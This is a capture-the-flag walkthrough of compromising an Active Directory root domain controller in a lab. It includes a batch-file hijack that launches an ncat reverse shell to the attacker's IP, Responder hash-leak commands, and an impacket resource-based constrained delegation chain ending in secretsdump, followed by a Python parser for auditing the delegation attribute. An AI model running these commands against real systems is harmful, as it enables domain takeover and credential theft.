The Summit

K2 - Are you able to make your way through the mountain? - by hadrian3689


Recon

We stop the second machine and start the third; the enumeration process begins all over again. Another Nmap scan finds the usual Windows-related ports, and again there is no website, so this looks like a pure Active Directory machine.

The open ports include SMB, RDP, LDAP and Kerberos. A default service and script scan reveals the hostname K2ROOTDC, so this time we have to compromise the root domain controller. We add K2ROOTDC.K2.THM to our /etc/hosts file.

Foothold

We use kerbrute again against our user list. It confirms administrator and j.smith as valid accounts (the tool reports valid usernames whether or not the supplied password matches, because the KDC answers differently for unknown principals).

kerbrute -users users.txt -password 'REDACTED' -domain k2.thm

We try to reuse the hash we already have: it does not work for the local administrator, but it does log us in as j.smith.

Lateral Movement

My first attempt to collect BloodHound data from the root DC used SharpHound. However, I must have used it incorrectly here; at least the output could not be found.

Something seems to be wrong, so let's skip it for now and see what we can discover as j.smith.

In the root of the C: drive we find a Scripts folder containing a batch file that copies a file notes.txt into o.armstrong's Documents directory. A service or scheduled task presumably runs this as o.armstrong.

Unfortunately, as j.smith we are not allowed to list the scheduled tasks:

schtasks /query /fo LIST /v

Looking at the permissions, we have full control on the Scripts folder but no write access on the batch file itself.

Full control on the folder includes the right to delete its children, so we can delete the file and replace it with our own.

We first try to copy the notes into the Scripts folder. To do this, we delete the original backup.bat, write our own, and grant o.armstrong full access so the task can still read and run it:

Set-Content -Path "C:\Scripts\backup.bat" -Value 'copy C:\Users\o.armstrong\Desktop\notes.txt C:\Scripts\notes.txt'
icacls "C:\Scripts\backup.bat" /grant o.armstrong:F

After a short time the copied notes appear, but they don't get us anywhere.

We repeat the step for the user flag and are successful:

Set-Content -Path "C:\Scripts\backup.bat" -Value 'copy C:\Users\o.armstrong\Desktop\user.txt C:\Scripts\user.txt'

Now we replace it with a reverse shell, using an ncat.exe binary so that we do not trigger the AV.

I had ncat.exe lying around; I am not sure whether it was from the following source.

It is not necessary to get a reverse shell to retrieve o.armstrong's hash for the further escalation steps. Alternatively, the batch file can be modified directly to leak the hash: start Responder with sudo responder -I tun0 and put net use \\10.8.211.1\share into the batch file. After a short time the hash arrives, which saves some steps.

We upload ncat.exe to the Scripts folder using evil-winrm's upload command.

Start a listener on our machine on port 4444.

And replace the .bat.

Set-Content -Path "C:\Scripts\backup.bat" -Value 'C:\Scripts\.\ncat.exe 10.8.211.1 4444 -e powershell'

After a short wait we receive a connection back as o.armstrong.

Now we can inspect the scheduled task:

schtasks /query /fo LIST /v

Privilege Escalation

Next we want to use bloodhound-python to collect the AD data we need to find an exploitation path, since, as mentioned, SharpHound.exe did not work for us. bloodhound-python resolves the domain and DC names via DNS, and our VPN client does not use the target DC as its resolver, so lookups for k2.thm would fail or go to the wrong server. We therefore start dnschef first. DNSChef is a DNS proxy that answers selected queries with addresses we choose; it is normally used in penetration tests to redirect traffic or to simulate malicious DNS responses for specific domains. Here it runs on 127.0.0.1, returns the DC's IP for k2.thm, and we point bloodhound-python at it with -ns 127.0.0.1.

Next we run bloodhound-python as j.smith, passing his NT hash:

bloodhound-python -d k2.thm -c All -u 'j.smith' --hashes 'REDACTED:REDACTED' -dc k2.thm -ns 127.0.0.1

We see that our compromised user o.armstrong is a member of the group IT DIRECTOR.

Querying for the shortest paths to high value targets shows that this group has GenericWrite on the domain controller's computer object.

Right-clicking the edge shows the suggested abuse. For this we need o.armstrong's actual credentials; the reverse shell alone does not give us those.

We can try to obtain them by capturing his NTLM hash with Responder. The command sudo responder -I tun0 starts Responder listening on the tun0 VPN interface; it answers name-resolution and authentication requests (SMB, HTTP and others), so a client that is tricked into connecting to our IP sends us an NTLM challenge-response that we can crack offline.

sudo responder -I tun0

From this blog we get the info on how to trigger a request to our Responder and leak a hash.

From the o.armstrong shell we request the following address:

curl file://10.8.211.1/leak.leak.html


Responder captures the Net-NTLMv2 response, and we crack it offline. We now have o.armstrong's password.

Again, shoutout to Jaxafed for discussing the following exploit chain, since my initial approach did not work properly. The following commands were provided by Jaxafed. In the end, using the SAMR method for addcomputer.py (instead of its default LDAPS) is what made it work.

In this chain, a computer account named "ATTACKERSYSTEM$" is added to the K2.THM domain over SAMR using o.armstrong's credentials; an ordinary user can do this because of the default ms-DS-MachineAccountQuota of 10. Because o.armstrong (via IT DIRECTOR) has GenericWrite on K2ROOTDC$, rbcd.py writes ATTACKERSYSTEM$ into the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute, which configures resource-based constrained delegation (RBCD) from our computer account to the DC. Next, getST.py uses S4U2Self and S4U2Proxy as ATTACKERSYSTEM$ to obtain a Kerberos service ticket for cifs/K2ROOTDC.k2.thm in the name of Administrator. Finally, secretsdump.py uses that ticket from the ccache (-k -no-pass) to extract the password hashes from the domain controller without needing a password. Two things to check if this fails: the impersonated account must not be marked "sensitive and cannot be delegated" or be a member of Protected Users, and the SPN given to getST.py must match the DC's DNS name. A deep dive into RBCD exploitation can be found here:

addcomputer.py -method SAMR -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host K2ROOTDC.K2.THM -domain-netbios K2.THM 'K2.THM/o.armstrong:REDACTED'
rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'K2ROOTDC$' -action 'write' 'K2.THM/o.armstrong:REDACTED'
getST.py -spn 'cifs/K2ROOTDC.k2.thm' -impersonate 'Administrator' 'K2.THM/attackersystem$:Summer2018!'
export KRB5CCNAME=Administrator.ccache

secretsdump.py -k -no-pass 'K2.THM/Administrator@k2rootdc.k2.thm'
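To make concrete what the rbcd.py step above actually writes, here is an added example (my own code, not part of the original writeup and not impacket's code) that builds and parses the self-relative security descriptor stored in msDS-AllowedToActOnBehalfOfOtherIdentity on K2ROOTDC$. It uses the same values impacket does: owner and group BUILTIN\Administrators, control SE_SELF_RELATIVE|SE_DACL_PRESENT, and one ACCESS_ALLOWED ACE with mask 0x000F01FF per delegated computer. The SID used for ATTACKERSYSTEM$ is constructed; rbcd.py looks the real one up over LDAP. The parser is the part a defender wants: read the attribute back from a DC and list which accounts it currently trusts to act on behalf of other identities.

```python
import struct

# Security descriptor control bits and ACE constants (MS-DTYP).
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF            # the mask impacket's rbcd.py puts in the ACE
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"


def sid_to_bytes(sid: str) -> bytes:
    """Encode a textual SID (S-1-5-21-...) in its binary form (MS-DTYP 2.4.2.2)."""
    parts = sid.split("-")
    if parts[0] != "S":
        raise ValueError("not a SID: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs))
            + authority.to_bytes(6, "big")          # IdentifierAuthority is big-endian
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(data: bytes) -> str:
    """Decode a binary SID back to its textual form."""
    revision, count = struct.unpack_from("<BB", data, 0)
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, data, 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def access_allowed_ace(sid: str, mask: int = FULL_CONTROL) -> bytes:
    """ACCESS_ALLOWED_ACE: type(1) flags(1) size(2) mask(4) SID."""
    sid_bytes = sid_to_bytes(sid)
    return struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_bytes), mask) + sid_bytes


def build_acl(aces: list) -> bytes:
    """ACL header: revision(1) sbz1(1) size(2) ace_count(2) sbz2(2), followed by the ACEs."""
    body = b"".join(aces)
    return struct.pack("<BBHHH", 4, 0, 8 + len(body), len(aces), 0) + body


def rbcd_security_descriptor(delegate_from_sids: list) -> bytes:
    """Self-relative SD whose DACL grants FULL_CONTROL to every SID given.
    This is the blob that rbcd.py -action write stores on the delegate-to computer."""
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    group = owner
    dacl = build_acl([access_allowed_ace(s) for s in delegate_from_sids])
    off_owner = 20                              # the SD header is 20 bytes
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(group)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         off_owner, off_group, 0, off_dacl)   # OffsetSacl = 0: no SACL
    return header + owner + group + dacl


def allowed_to_act(sd: bytes) -> list:
    """Parse the attribute back: [(sid, mask), ...] for the ACCESS_ALLOWED ACEs in the DACL."""
    _, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos, result = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            result.append((bytes_to_sid(sd[pos + 8:pos + ace_size]), mask))
        pos += ace_size
    return result


if __name__ == "__main__":
    # Constructed SID for ATTACKERSYSTEM$; the real one is the account's objectSid in LDAP.
    attacker_sid = "S-1-5-21-1111111111-2222222222-3333333333-1105"
    blob = rbcd_security_descriptor([attacker_sid])
    print("msDS-AllowedToActOnBehalfOfOtherIdentity =", blob.hex())
    for sid, mask in allowed_to_act(blob):
        print("allowed to act: %s mask=0x%08X" % (sid, mask))
```

On a live domain the blob returned by rbcd_security_descriptor is what ends up in the attribute; feeding the raw attribute value of any computer object into allowed_to_act is a quick way to audit which accounts may impersonate users to that host, which is exactly the condition a detection for this technique should alert on.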

With the extracted Administrator hash we can log in and retrieve the final flag.
